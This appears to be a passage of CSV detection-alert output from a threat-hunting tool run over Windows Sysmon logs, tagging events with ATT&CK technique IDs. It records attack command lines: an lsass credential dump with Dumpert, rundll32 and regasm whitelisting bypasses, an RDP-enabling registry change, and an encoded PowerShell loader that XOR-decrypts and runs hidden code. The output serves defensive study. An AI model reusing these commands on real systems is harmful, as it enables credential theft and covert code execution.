2019-05-13 18:03:19.482 + 365ABB72-B167-5CD9-0000-0010EE150C00 + 2372 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + /c notepad.exe + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-B0EC-5CD9-0000-0020DE330100 + 0x133de + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B0EC-5CD9-0000-0010D9D20000 + 944 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766825.255498,2020-03-21T09:00:25.255498+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243547 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.122 + 747F3D96-9F69-5E75-0000-0010DE732000 + 6400 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606809.977481,2019-04-18T21:00:09.977481+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 23 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 16:58:14.781 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\vaultcli.dll + 6.1.7600.16385 (win7_rtm.090713-1255) + Credential Vault Client Library + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56 + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.255498,2020-03-21T09:00:25.255498+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243547 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.122 + 747F3D96-9F69-5E75-0000-0010DE732000 + 6400 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766825.255498,2020-03-21T09:00:25.255498+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243547 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.122 + 747F3D96-9F69-5E75-0000-0010DE732000 + 6400 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1003.001] Credential dump Thread Open to Lsass,1556628223.784179,2019-04-30T16:43:43.784179+04:00,,Threat,Critical,Process ( \\VBOXSVR\HTools\voice_mail.msg.exe) attempted to access lsass process ( C:\Windows\System32\lsass.exe),8," + + + + + 8 + 2 + 4 + 8 + 0 + 0x8000000000000000 + + + 9060 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 12:43:43.784 + 365ABB72-4055-5CC8-0000-0010769D0B00 + 1532 + \\VBOXSVR\HTools\voice_mail.msg.exe + 365ABB72-3FE0-5CC8-0000-00107E590000 + 492 + C:\Windows\System32\lsass.exe + 1744 + 0x001A0000 + + + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436014.483714,2019-07-30T01:33:34.483714+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4923 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:34.234 + 747F3D96-662E-5D3F-0000-0010C2048900 + 1976 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1077] Windows Admin Shares - Process - Created,1584794155.89745,2020-03-21T16:35:55.897450+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net start CDPSvc ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 244336 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 12:35:55.872 + 747F3D96-0A2B-5E76-0000-0010C02A3D00 + 7072 + C:\Windows\System32\net.exe + 10.0.17763.1 (WinBuild.160101.0800) + Net Command + Microsoft® Windows® Operating System + Microsoft Corporation + net.exe + net start CDPSvc + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-06A4-5E76-0000-002043DE0200 + 0x2de43 + 1 + High + SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 + 747F3D96-077C-5E76-0000-0010A5BA2300 + 5068 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920557.000311,2019-05-27T05:29:17.000311+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\InetSRV\appcmd.exe" list vdir /text:physicalpath ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5877 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:16.960 + 365ABB72-3D6C-5CEB-0000-00107257FF00 + 3484 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\InetSRV\appcmd.exe" list vdir /text:physicalpath + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1561102550.259077,2019-06-21T11:35:50.259077+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 238378 + + + + + Microsoft-Windows-Sysmon/Operational + alice.insecurebank.local + + + + + + 2019-06-21 07:35:50.093 + ECAD0485-88D6-5D0C-0000-001007AA1D00 + 1568 + C:\Windows\System32\rundll32.exe + 6.3.9600.17415 (winblue_r4.141028-1500) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump + C:\Users\administrator\Desktop\x64\ + insecurebank\Administrator + ECAD0485-87E3-5D0C-0000-0020266A0F00 + 0xf6a26 + 2 + High + SHA1=D4AC232D507769FFD004439C15302916A40D9831,MD5=6C308D32AFA41D26CE2A0EA8F7B79565,SHA256=5CC2C563D89257964C4B446F54AFE1E57BBEE49315A9FC001FF5A6BCB6650393,IMPHASH=156B2AC675B1B9202AF35C643105610C + ECAD0485-8897-5D0C-0000-0010A2FA1C00 + 3964 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1561102550.259077,2019-06-21T11:35:50.259077+04:00,,Threat,High,"Found User (insecurebank\Administrator) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 238378 + + + + + Microsoft-Windows-Sysmon/Operational + alice.insecurebank.local + + + + + + 2019-06-21 07:35:50.093 + ECAD0485-88D6-5D0C-0000-001007AA1D00 + 1568 + C:\Windows\System32\rundll32.exe + 6.3.9600.17415 (winblue_r4.141028-1500) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump + C:\Users\administrator\Desktop\x64\ + insecurebank\Administrator + ECAD0485-87E3-5D0C-0000-0020266A0F00 + 0xf6a26 + 2 + High + SHA1=D4AC232D507769FFD004439C15302916A40D9831,MD5=6C308D32AFA41D26CE2A0EA8F7B79565,SHA256=5CC2C563D89257964C4B446F54AFE1E57BBEE49315A9FC001FF5A6BCB6650393,IMPHASH=156B2AC675B1B9202AF35C643105610C + ECAD0485-8897-5D0C-0000-0010A2FA1C00 + 3964 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1561102550.259077,2019-06-21T11:35:50.259077+04:00,,Threat,High,"Found User (insecurebank\Administrator) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 238378 + + + + + Microsoft-Windows-Sysmon/Operational + alice.insecurebank.local + + + + + + 2019-06-21 07:35:50.093 + ECAD0485-88D6-5D0C-0000-001007AA1D00 + 1568 + C:\Windows\System32\rundll32.exe + 6.3.9600.17415 (winblue_r4.141028-1500) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump + C:\Users\administrator\Desktop\x64\ + insecurebank\Administrator + ECAD0485-87E3-5D0C-0000-0020266A0F00 + 0xf6a26 + 2 + High + SHA1=D4AC232D507769FFD004439C15302916A40D9831,MD5=6C308D32AFA41D26CE2A0EA8F7B79565,SHA256=5CC2C563D89257964C4B446F54AFE1E57BBEE49315A9FC001FF5A6BCB6650393,IMPHASH=156B2AC675B1B9202AF35C643105610C + ECAD0485-8897-5D0C-0000-0010A2FA1C00 + 3964 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational +[ T1059 ] wscript or cscript runing script,1567169648.171875,2019-08-30T16:54:08.171875+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript c:\ProgramData\memdump.vbs notepad.exe) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (C:\Windows\System32\cmd.exe) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 32151 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-30 12:54:07.823 + 747F3D96-1C6F-5D69-0000-0010323C1F00 + 2576 + C:\Windows\System32\cscript.exe + 5.812.10240.16384 + Microsoft ® Console Based Script Host + Microsoft ® Windows Script Host + Microsoft Corporation + cscript c:\ProgramData\memdump.vbs notepad.exe + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1B6A-5D69-0000-0020E5810E00 + 0xe81e5 + 1 + High + SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC + 747F3D96-1B6C-5D69-0000-00106F060F00 + 2128 + C:\Windows\System32\cmd.exe + C:\Windows\System32\cmd.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436014.411034,2019-07-30T01:33:34.411034+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4922 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:34.216 + 747F3D96-662E-5D3F-0000-001011038900 + 6020 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1556380674.165738,2019-04-27T19:57:54.165738+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /c del /q "C:\Users\IEUser\Downloads\Flash_update.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6622 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1059,technique_name=Command-Line Interface + 2019-04-27 15:57:54.087 + 365ABB72-7C02-5CC4-0000-0010FD6E0C00 + 3188 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" /c del /q "C:\Users\IEUser\Downloads\Flash_update.exe" + C:\Users\IEUser\AppData\Roaming\ + IEWIN7\IEUser + 365ABB72-7AB1-5CC4-0000-0020BEF40000 + 0xf4be + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-7C01-5CC4-0000-00102B3E0C00 + 2680 + C:\Users\IEUser\Downloads\Flash_update.exe + "C:\Users\IEUser\Downloads\Flash_update.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1112] process updating fDenyTSConnections or UserAuthentication registry key values,1552853889.282593,2019-03-18T00:18:09.282593+04:00,,Threat,High,[T1112] process updating fDenyTSConnections or UserAuthentication registry key values,13," + + + + + 13 + 2 + 4 + 13 + 0 + 0x8000000000000000 + + + 5267 + + + + + Microsoft-Windows-Sysmon/Operational + PC04.example.corp + + + + + + SetValue + 2019-03-17 20:18:09.272 + 365ABB72-AB70-5C8E-0000-0010DF1F0A00 + 3700 + C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst.exe + HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections + DWORD (0x00000000) + +",PC04.example.corp,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1558920522.711005,2019-05-27T05:28:42.711005+04:00,,Threat,Critical,"Found User (IIS APPPOOL\DefaultAppPool) run Suspicious PowerShell commands that include ( -enc , -noni ,-noni,-nop,powershell,\Windows\System32,ls, -t , -w ) in event with Command Line ("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGM